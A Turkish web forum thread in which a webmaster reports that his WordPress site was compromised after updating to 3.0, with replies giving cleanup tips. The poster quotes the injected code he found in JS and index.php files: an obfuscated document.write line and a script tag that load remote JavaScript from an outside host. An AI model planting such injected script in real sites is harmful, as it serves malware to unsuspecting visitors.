Yardım... Aceba iframe mi yedim?

Arkadaşlar iyi günler. Bugün wordpress 3.0 a siteyi güncelledim akşam saat 6-7 arası. Hiç bi problem yoktu 1 saat sonra yemeğe indim ve yemekten dönünce sitemde internal server 500 hatası gördüm. Sonra cpanele girdim. Error logdan puplic_html ve index.php nin 777 yapıldığını gördüm. Onları düzelttikten sonra site açıldı. Neyse sonra site açılırken sol altta fukko.ircpuplication.org die bi adres belirdi ve fukko.ircpuplication.org konumundan veri alınıyor felan çıktı.

Kodlara baktım siteye footer da bi kod gözüme çarptı kod şuna benzerdi.

<script blabla işte fukko.ircpuplication.org/XXX.js

XXX dediğim de başka birşeydi aklımda değil şu an. Girdim direk o kodu sildim

Ondan sonra bütün dosyalara baktım kod bulamadım.Yani kafam almadı muhabbeti.

Neyse sadete geleyim siteye girerken hala o sol tarafta veri alınıyor diyo bu linkle ilgili. Ama internet explorer ve google chrome dan girdiğimde öyle birşey göremiyorum. Sorun nedir bi yardımcı olun kafayi yicem 3 saattir

kodu sildikten sonra tekrar o kodlar çıktımı ? eğer çıktı ise iframe yemişsiniz.Aşağıdaki konulara bak,

Bura , Buraya bak ve Burada ara...

temizlemenize yardımcı olabilirm.şimdi lik tek yapman gereken temiz bir bilgisayarda ana index.php theme içindeki index.php vs gibi alanlar.Daha sonra temiz farklı pc de gene şifreni değiş: sorun çözülür

Siteyi Pmlermisiniz bi inceleyim.

site adresini yollar mısın

Yok hocam kodu silince bi daha çıkmadı. Başka biyerde de öyle bi kod göremedim. Php adminde de arattim yoktu. Güncellemedendir belki diyerek elimle güncelleyeyim dedim şimdi güncelleme yapiyorum tekrardan bilgilendiririm hocam saolasın

iframe gibi hocam. bir daha çıkmaması iframe olmadığını göstermez.

Merhabalar JS dosyalarini tarattirmanizi tavsiye ederim bu aralar iframelar le bir cok kisi ben dahil basimiz belada

Ayrica kontrol etmenizin sizin acinizdan faydali olabilecegi bir kac yol tavsiye edebilirim

- Chorme tarayici ile sitenizi ziyaret edin eger iframe varsa size bildiriyor.
- Bilgisayarinizda Nod32 varsa sitede iframe oldugu zaman uyari veriyor.
- http://www.siteadvisor.com/sites/r10.net bu adresten sitenizin kontrolu yapabilirsiniz.

Arkadaşlar yaklaşık 2-3 saat önce temiz bi pc den bütün JS leri kontrol ettim. Ve bir çoğunda o kodu buldum sildim. Şifreleri herşeyi tekrardan değiştirdim. Şimdi eve geldim siteye girdim. Bu sefer başka bir sayfa gösteriyor... Tekrardan araştırıyorum şu an. Ne olduysa 3.0 a güncelledikten 30 dakka sonra oldu

Evet arkadaşlar bu sefer aynı kod farklı site JS lerimin çoğunda mevcut. Kod bu ;

document.write('<s'+'cript type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/Leaderboard.js"></scr'+'ipt>');

Bu açığı nasıl kapatabilirim?


Edit : Arkadaşlar bunlarda index.phplerin içinde bulduğum kodlar ;

<script type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/Leaderboard.js"></script>
<!--2577a01bf2a998bacdd5dc9a781b2f35-->


3. Edit : 2.9.2 sürümüne döndüm tekrardan. 3.0 da nazar değdi. Bakalım yine yiecekmiyim o kodları..